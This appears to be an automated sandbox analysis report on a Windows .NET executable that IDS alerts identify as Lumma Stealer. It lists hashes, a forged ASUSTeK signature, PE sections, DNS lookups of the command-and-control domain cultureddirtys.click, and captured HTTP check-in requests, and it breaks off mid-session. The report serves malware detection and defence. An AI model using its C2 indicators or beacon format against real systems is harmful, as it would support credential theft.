                        Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..}..f..............................................................................................................................................................................................................................................................................................................................................+5j-........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.636437154879793
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        • Win32 Executable (generic) a (10002005/4) 49.96%
                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:mWAik6b.exe
                        File size:456'304 bytes
                        MD5:16a53e18ca53fe602974f0a4b7ffbf3c
                        SHA1:8c4b935040158b1ba65a599413b14e8d9e3b975e
                        SHA256:bb3b567a9f65a64f444738b2c73e8698db247a6b78aa0d1c6ae6cd05bdcc31a9
                        SHA512:678056adbf4bd491d9e980b79ed587bb7f04c1acfcbbfabbbe8d1d04de401beaa8ba4ebd84cf2e4cbbef49dc1d98f13f99bedf2afeca162da186d852577b29cd
                        SSDEEP:12288:zA0WK2+gqm3fsyXAyqVEOkg1LIRgxVPTLTl:00tmLgVCgLWshTl
                        TLSH:F0A4D0686A68D537C2AE4775E4E3511263F1A4D3FD62F745BC8804F24D12380AA7A2FF
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2.................0.............>.... ... ....@.. .......................@............`................................
                        Icon Hash:00928e8e8686b000
                        Entrypoint:0x421a3e
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0xECEDE332 [Sun Dec 18 02:19:30 2095 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                        Signature Valid:false
                        Signature Issuer:CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
                        Signature Validation Error:The digital signature of the object did not verify
                        Error Number:-2146869232
                        Not Before, Not After
                        • 08/10/2020 02:00:00 12/10/2023 14:00:00
                        Subject Chain
                        • CN=ASUSTeK COMPUTER INC., O=ASUSTeK COMPUTER INC., L=Beitou District, S=Taipei City, C=TW, SERIALNUMBER=23638777, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=TW
                        Version:3
                        Thumbprint MD5:332CDC164B1324C3FF3F64E228C5FFFC
                        Thumbprint SHA-1:CBFB3D25134A5FF6FCF2924D5B4BE16194EA7E13
                        Thumbprint SHA-256:531855F05B9D55E4F6DDEBC443706382DDB9ACBD2B8AB24004822BE204420943
                        Serial:0C9838F673F9B1CCE395CFAB2B6684E4
                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x219f00x4b.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x598.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x6d0000x2670.idata
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x240000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x219a70x1c.text
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000x1fa440x1fc007c297cc8f463f81875ed0f7ba3dd3ff0False0.4013056717519685data5.796591200875089IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc0x220000x5980x600511dd0b163083f747b4fa3f1e450067cFalse0.41015625data4.038713703339799IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x240000xc0x200b1171333753a88cda4e7356665065f4cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        .idata0x260000x4c8000x4c8007de813a6b35a7da0967b3dd52fa25e14False1.0003382863562091data7.999390808292112IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_VERSION0x220a00x30cdata0.41923076923076924
                        RT_MANIFEST0x223ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                        DLLImport
                        mscoree.dll_CorExeMain
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2025-01-14T16:15:10.078904+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705172.67.150.129443TCP
                        2025-01-14T16:15:10.627860+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705172.67.150.129443TCP
                        2025-01-14T16:15:10.627860+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705172.67.150.129443TCP
                        2025-01-14T16:15:11.108776+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706172.67.150.129443TCP
                        2025-01-14T16:15:11.585608+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549706172.67.150.129443TCP
                        2025-01-14T16:15:11.585608+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706172.67.150.129443TCP
                        2025-01-14T16:15:12.429285+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708172.67.150.129443TCP
                        2025-01-14T16:15:13.839625+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713172.67.150.129443TCP
                        2025-01-14T16:15:15.246349+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549715172.67.150.129443TCP
                        2025-01-14T16:15:16.391120+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549716172.67.150.129443TCP
                        2025-01-14T16:15:19.932487+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549716172.67.150.129443TCP
                        2025-01-14T16:15:20.742313+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549719172.67.150.129443TCP
                        2025-01-14T16:15:29.547266+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549760172.67.150.129443TCP
                        TimestampSource PortDest PortSource IPDest IP
                        Jan 14, 2025 16:15:09.612021923 CET49705443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:09.612107992 CET44349705172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:09.612209082 CET49705443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:09.613903046 CET49705443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:09.613933086 CET44349705172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:10.078810930 CET44349705172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:10.078903913 CET49705443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:10.121494055 CET49705443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:10.121520996 CET44349705172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:10.121865988 CET44349705172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:10.172396898 CET49705443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:10.203718901 CET49705443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:10.203761101 CET49705443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:10.203871012 CET44349705172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:10.627815962 CET44349705172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:10.627897024 CET44349705172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:10.627966881 CET49705443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:10.630580902 CET49705443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:10.630613089 CET44349705172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:10.630635023 CET49705443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:10.630640984 CET44349705172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:10.649111986 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:10.649161100 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:10.649267912 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:10.650924921 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:10.650937080 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.108670950 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.108776093 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.137386084 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.137403965 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.137698889 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.138998032 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.139020920 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.139072895 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.585609913 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.585691929 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.585767031 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.585799932 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.585829020 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.585879087 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.585885048 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.585968018 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.586019993 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.586025000 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.586292982 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.586349964 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.586354971 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.590491056 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.590565920 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.590570927 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.641051054 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.641083002 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.672182083 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.672208071 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.672264099 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.672291994 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.672307968 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.672343969 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.672375917 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.672605991 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.672621012 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.672636986 CET49706443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.672642946 CET44349706172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.939053059 CET49708443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.939116955 CET44349708172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:11.939184904 CET49708443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.939873934 CET49708443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:11.939889908 CET44349708172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:12.429176092 CET44349708172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:12.429285049 CET49708443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:12.430881977 CET49708443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:12.430911064 CET44349708172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:12.431207895 CET44349708172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:12.432439089 CET49708443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:12.432631969 CET49708443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:12.432682991 CET44349708172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:13.339165926 CET44349708172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:13.339297056 CET44349708172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:13.339432955 CET49708443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:13.339621067 CET49708443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:13.339643955 CET44349708172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:13.356189013 CET49713443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:13.356242895 CET44349713172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:13.356348038 CET49713443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:13.356672049 CET49713443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:13.356692076 CET44349713172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:13.839546919 CET44349713172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:13.839624882 CET49713443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:13.840919971 CET49713443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:13.840929985 CET44349713172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:13.841178894 CET44349713172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:13.850585938 CET49713443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:13.850636959 CET49713443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:13.850661039 CET44349713172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:13.850708008 CET49713443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:13.891345978 CET44349713172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:14.447160959 CET44349713172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:14.447261095 CET44349713172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:14.447320938 CET49713443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:14.452724934 CET49713443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:14.452754974 CET44349713172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:14.776185989 CET49715443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:14.776230097 CET44349715172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:14.776309013 CET49715443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:14.776618958 CET49715443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:14.776631117 CET44349715172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:15.246203899 CET44349715172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:15.246349096 CET49715443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:15.247669935 CET49715443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:15.247688055 CET44349715172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:15.248203993 CET44349715172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:15.264863968 CET49715443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:15.265010118 CET49715443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:15.265072107 CET44349715172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:15.265194893 CET49715443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:15.265208006 CET44349715172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:15.777400970 CET44349715172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:15.777513027 CET44349715172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:15.777565956 CET49715443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:15.777729988 CET49715443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:15.777745008 CET44349715172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:15.921300888 CET49716443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:15.921401024 CET44349716172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:15.921499968 CET49716443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:15.921830893 CET49716443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:15.921866894 CET44349716172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:16.391024113 CET44349716172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:16.391119957 CET49716443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:16.392426014 CET49716443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:16.392457962 CET44349716172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:16.392693043 CET44349716172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:16.393714905 CET49716443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:16.393811941 CET49716443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:16.393831015 CET44349716172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:19.932498932 CET44349716172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:19.932599068 CET44349716172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:19.932689905 CET49716443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:19.932949066 CET49716443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:19.932991028 CET44349716172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.269002914 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.269052029 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.269141912 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.269450903 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.269463062 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.742114067 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.742312908 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.743474960 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.743482113 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.743760109 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.745048046 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.745716095 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.745740891 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.745846987 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.745862007 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.745964050 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.746037006 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.746157885 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.746181965 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.746314049 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.746340036 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.746469021 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.746484995 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.746498108 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.746516943 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.746710062 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.746743917 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.756113052 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.756303072 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.756346941 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.756369114 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.756408930 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.756540060 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.756565094 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:20.756592035 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.756608963 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:20.756645918 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:29.360846043 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:29.360955954 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:29.361176014 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:29.361299992 CET49719443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:29.361314058 CET44349719172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:29.372662067 CET49760443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:29.372699022 CET44349760172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:29.372817039 CET49760443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:29.373173952 CET49760443192.168.2.5172.67.150.129
                        Jan 14, 2025 16:15:29.373189926 CET44349760172.67.150.129192.168.2.5
                        Jan 14, 2025 16:15:29.547266006 CET49760443192.168.2.5172.67.150.129
                        TimestampSource PortDest PortSource IPDest IP
                        Jan 14, 2025 16:15:09.590918064 CET5397053192.168.2.51.1.1.1
                        Jan 14, 2025 16:15:09.604902983 CET53539701.1.1.1192.168.2.5
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jan 14, 2025 16:15:09.590918064 CET192.168.2.51.1.1.10xfb9bStandard query (0)cultureddirtys.clickA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jan 14, 2025 16:15:09.604902983 CET1.1.1.1192.168.2.50xfb9bNo error (0)cultureddirtys.click172.67.150.129A (IP address)IN (0x0001)false
                        Jan 14, 2025 16:15:09.604902983 CET1.1.1.1192.168.2.50xfb9bNo error (0)cultureddirtys.click104.21.90.4A (IP address)IN (0x0001)false
                        • cultureddirtys.click
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549705172.67.150.129443940C:\Users\user\Desktop\mWAik6b.exe
                        TimestampBytes transferredDirectionData
                        2025-01-14 15:15:10 UTC267OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: cultureddirtys.click
                        2025-01-14 15:15:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                        Data Ascii: act=life
                        2025-01-14 15:15:10 UTC1130INHTTP/1.1 200 OK
                        Date: Tue, 14 Jan 2025 15:15:10 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=ernq9mjqvc5nahb4u3does2hnc; expires=Sat, 10 May 2025 09:01:49 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YKy4dhZe95CmA45mC3xJxlQX93iB5f%2ByDhhZlML2oOllUyaU3PELUjpNn6WRBUs3bVpGN01FEdJQRGioZ6pEwxcG%2BBv53KRQcIjK8KKT2yJeseO56UX2XF9yhbHhySeBPh98NKHuXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 901e947519795e72-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=2396&min_rtt=2378&rtt_var=928&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=911&delivery_rate=1155977&cwnd=32&unsent_bytes=0&cid=215fe3d109138efb&ts=563&x=0"
                        2025-01-14 15:15:10 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                        Data Ascii: 2ok
                        2025-01-14 15:15:10 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.549706172.67.150.129443940C:\Users\user\Desktop\mWAik6b.exe
                        TimestampBytes transferredDirectionData
                        2025-01-14 15:15:11 UTC268OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
